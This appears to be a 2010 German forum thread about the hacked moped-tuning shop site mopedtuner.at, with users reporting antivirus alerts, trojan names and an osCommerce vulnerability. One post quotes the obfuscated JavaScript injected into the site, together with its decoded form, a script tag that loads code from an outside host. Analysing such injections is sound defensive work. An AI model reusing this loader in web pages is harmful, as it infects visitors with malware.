XsonicX Geschrieben July 9, 2010 Melden Share Geschrieben July 9, 2010 (bearbeitet) Tach zusammen,^^ Wollt mal nachfragen was mit Mopedtuner.at los ist haha ? Scheint so als wurde es gehackt oder? ..Betreten der Seite auf eigene Gefahr!!Wisst ihr mehr?mfg bearbeitet July 9, 2010 von XsonicX Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
XsonicX Geschrieben July 9, 2010 Autor Melden Share Geschrieben July 9, 2010 Tag!Ich verschieb das ganze mal in den Offtopic Bereich.Hm, bei mir lässt sich die Seite überhaupt nicht öffnen. Der Besitzer ist ja gerade im Urlaub, der wird sich schon darum kümmern wenn er zurück ist. Tja, ich und ein Freund von mir bekommen einen VIRUS!! Malware."Fehlende Plugin" NICHT INSTALLIEREN! Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
TCE Racing Team Geschrieben July 9, 2010 Melden Share Geschrieben July 9, 2010 bei mir funkt die seite überhaupt nicht mehr^^ Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
XsonicX Geschrieben July 9, 2010 Autor Melden Share Geschrieben July 9, 2010 bei mir funkt die seite überhaupt nicht mehr^^Mein Antivirus fand eine Maleware, also vorsicht geboten . Bei einem Freund wurde ein Trojaner gefunden .mfg Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
SiXaM Geschrieben July 9, 2010 Melden Share Geschrieben July 9, 2010 Ich komme net mal mehr Drauf! xD Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
thefelix. Geschrieben July 9, 2010 Melden Share Geschrieben July 9, 2010 Kaspersky schlägt auch Alarm.. Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
aL3x^ Geschrieben July 9, 2010 Melden Share Geschrieben July 9, 2010 Ich bin der User von dem da XsonicX spricht.Bin auf die Seite gangen um was nachzusehen, auf einmal schlug Antivir Alarm.Jetzt hab ich 4 Malware Viren oben. Trojan ist auch dabei -.-'3 hab ich einstweilen schon wegbekommen. Setzten sich wie immer bei mir bei den Bildern ab und vervielfachten diese, komisch aber wahr. Hab alle gelöscht und jetzt ists vorbei.Nur im Firefox sitzt noch einer -.-Werd ich deinstallieren und dann komplett löschen. Werds schon wegbekommen.MfG Al3x Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
XsonicX Geschrieben July 9, 2010 Autor Melden Share Geschrieben July 9, 2010 Ich bin der User von dem da XsonicX spricht.Bin auf die Seite gangen um was nachzusehen, auf einmal schlug Antivir Alarm.Jetzt hab ich 4 Malware Viren oben. Trojan ist auch dabei -.-'3 hab ich einstweilen schon wegbekommen. Setzten sich wie immer bei mir bei den Bildern ab und vervielfachten diese, komisch aber wahr. Hab alle gelöscht und jetzt ists vorbei.Nur im Firefox sitzt noch einer -.-Werd ich deinstallieren und dann komplett löschen. Werds schon wegbekommen.MfG Al3xhm, bei mir wars nur ein maleware. xD naja, solche Server welche nicht großartig geschäftlich verwendet werden sind einfach und gefunde Fressen zum hacken. Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
XsonicX Geschrieben July 9, 2010 Autor Melden Share Geschrieben July 9, 2010 (bearbeitet) Tag!Na toll, zweimal Malware... aber egal, läuft eh in der "Sandbox".Danke an xsonicx für die Meldung. Sandbox?Bedankt euch Bei Al3x^ . Der hats bemerkt und ich wollte mal fragen ob ihr mehr dazu wisst.Ein Professor von uns (Er ist ein Tr***el xD) hatte auch nen Server... ~ 1 Monat lang dann war er gehackt. :/Wie gesagt, Vorsicht. Mein Antivir Läuft grade und hat nochwas Gefunden :S. noch ein Malware -.-mfg/e: TR/VB.Inject.53248.DGVerbreitungsmethode: • Autorun Dateien • Lokales Netzwerk • MessengerAliases: • Mcafee: W32/IRCbot virus • Sophos: Mal/VBInject-D • Panda: Trj/Kreeper.H • Eset: Win32/AutoRun.KS • Bitdefender: Trojan.Generic.3546827 Betriebsysteme: • Windows 2000 • Windows XP • Windows 2003Auswirkungen: • Lädt eine schädliche Dateien herunter • Erstellt schädliche Dateien • Änderung an der Registry • Ermöglicht unbefugten Zugriff auf den ComputerName: TR/VB.Inject.61441.DA Entdeckt am: 12/03/2010 Art: Trojan In freier Wildbahn: Ja Gemeldete Infektionen: Niedrig bis mittel Verbreitungspotenzial: Mittel Schadenspotenzial: Mittel Statische Datei: Ja Dateigröße: 61.441 Bytes MD5 Prüfsumme: 7cc9b28b3279b99fbf294180df9e4ecd IVDF Version: 7.10.05.64 - Fri, 12 Mar 2010 12:46 (GMT+1) Ist sogar "neu".. 12.03.2010 entdeckt bearbeitet July 9, 2010 von XsonicX Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
XsonicX Geschrieben July 9, 2010 Autor Melden Share Geschrieben July 9, 2010 Tag!"Sandbox" gehört zu Comodo Internet Security Dingens. Da kannst du unbekannte Programme starten ohne befürchten zu müssen, dass diese Schaden an dem System anrichten. Wobei ein Restrisiko bleibt immer...Ist fast das gleiche wie "Virtual Pc" von Microsoft. Nur mit dem Program von Microsoft kannst du viel geile Dinge anstellen. Aso xD. Hab ich grade im google angeschaut. Hört sich interessant an, muss ich mir auch mal zulegen. Danke Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Derbi_Gaber Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 Mensch, lasst doch mopedtuner.at in Ruhe^^Die Seite is ja jetzt off (absichtlich oder nicht sei dahingestellt).Leider is das Problem eben bei der Shop-Software osCommerce das sie ein rießen Sicherheitsloch im File-Manager hat, und somit das ändern beliebiger Seiten ohne iwelche Überprüfung zulässt. Es gab sogar ein Exploit dazu (gab!), was die Arbeit der Scriptkiddies sicher erleichtert hat.Fehler wurde gemeldet, Beispiel wurde auch gezeigt, wenn man nix dagegen tut is man leider selbst schuld.erli.at basiert aufs gleiche System, doch bei dem wär das nicht möglich, da er die erforderlichen Sicherheitsmaßnahmen getroffen hat.mfg Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
aL3x^ Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 (bearbeitet) Hab gestern AntiVir nochmals durchlaufen lassen.Die 4 Malwares sind weg, hab ich scheinbar alle beseitigen können, zumindest 3 davon. Der 4.te sitzt im Firefox, bin mir aber nicht sicher ob der nicht auch schon weg ist.Ka, bin der ur Noob in Sachen Computer^^Leider hat er beim gestrigen Durchlauf einen neuen Virus ausgespuckt -> JAVA/Agent.NLass es gerade nochmals durchlaufen, mal schaun was er diesmal sagt :/Mfg Al3xEdit:Die waren als erstes oben wie ich Mopedtuner.at aufgemacht hab:TR/Vundo.gen [trojan]TR/Vundo.genTR/Vundo.GenEXP/Pdfka.aog.1465 bearbeitet July 10, 2010 von aL3x^ Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Derbi_Gaber Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 @alex:Probier das Prog hier: VundoFix by AtribuneEs is speziell für den Vundo Trojaner ausgelegt, da der n ganz arger Hund is...Das mit JAVA und dem EXPloit hängt zusammen, so konnte der Trojaner auf deinen PC gelangen!mfg Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
aL3x^ Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 Danke =DWerd ich gleich mal ausprobieren.Jetzt is noch ein Trojaner dezugekommen, nachm 2.ten Durchlauf halt -.-TR/Siqqen.AMfG Al3x Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
**яaphi** Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 ich kann keine bilder anschauen!!????mfg. Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
joban# Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 na gut das ich ubuntu benütze xDalso ich würd zu zeit keine kontodaten auf mopedtuner.at eingeben die sind bestimmt dann iwo und nach ner zeit is das geld auch weg. denk mal das wegen dem solche seiten gehackt werden... Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Derbi_Gaber Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 (bearbeitet) äh.. ja...jetzt is es klar, die seite nimmt verbindung mit ner gefährlichen seite auf >_>und da derbi-gpr nicht on ist, siehst wirklich gefährlich aus...<script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">in klartext:<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>das geniale an dem hacker, er hat das admin-verzeichnis gelöscht/umbenannt, sonst könnte man ihn ja löschen >_> bearbeitet July 10, 2010 von Derbi_Gaber Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Black Jack Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 ich kann keine bilder anschauen!!????mfg.das war vorher auch schon Glaubts das es von 2stroke wer war? ^^ Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Bernilu_ Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 Ich wars Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Black Jack Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 Ich wars Nein. Du hättest eine Schwulenpornoseite daraus gemacht Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Bernilu_ Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 Nein. Du hättest eine Schwulenpornoseite daraus gemacht Mit deinem Bild auf da Startseite <33 Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Black Jack Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 Mit deinem Bild auf da Startseite <33 Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Der_böse_Mann Geschrieben July 10, 2010 Melden Share Geschrieben July 10, 2010 microsoft secruity essentials zeigt nen schwerwiegenden trojaner an ^^ Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Genericxer Geschrieben July 11, 2010 Melden Share Geschrieben July 11, 2010 muahaha, ich finds lahm das man das cniht schnell behbt, einfach bakup drüber und alles ist wieder da aber naja, hab das mal meinen lehrer in der htl gezeigt und der hat nurmehr gelacht XDD das einfachste vom einfachen scriptkiddies eben, so wie ich aja wenns wen interresiert ip von mopedtuner is 77.244.243.39 und wenn man da drauf geht funzt die seite nicht mehr weil der scipt geändert wurde, also Haaaaaack XDmfg.! Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
XsonicX Geschrieben July 11, 2010 Autor Melden Share Geschrieben July 11, 2010 muahaha, ich finds lahm das man das cniht schnell behbt, einfach bakup drüber und alles ist wieder da aber naja, hab das mal meinen lehrer in der htl gezeigt und der hat nurmehr gelacht XDD das einfachste vom einfachen scriptkiddies eben, so wie ich aja wenns wen interresiert ip von mopedtuner is 77.244.243.39 und wenn man da drauf geht funzt die seite nicht mehr weil der scipt geändert wurde, also Haaaaaack XDmfg.!Paulpanzer ist leider im Urlaubmfg Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Recommended Posts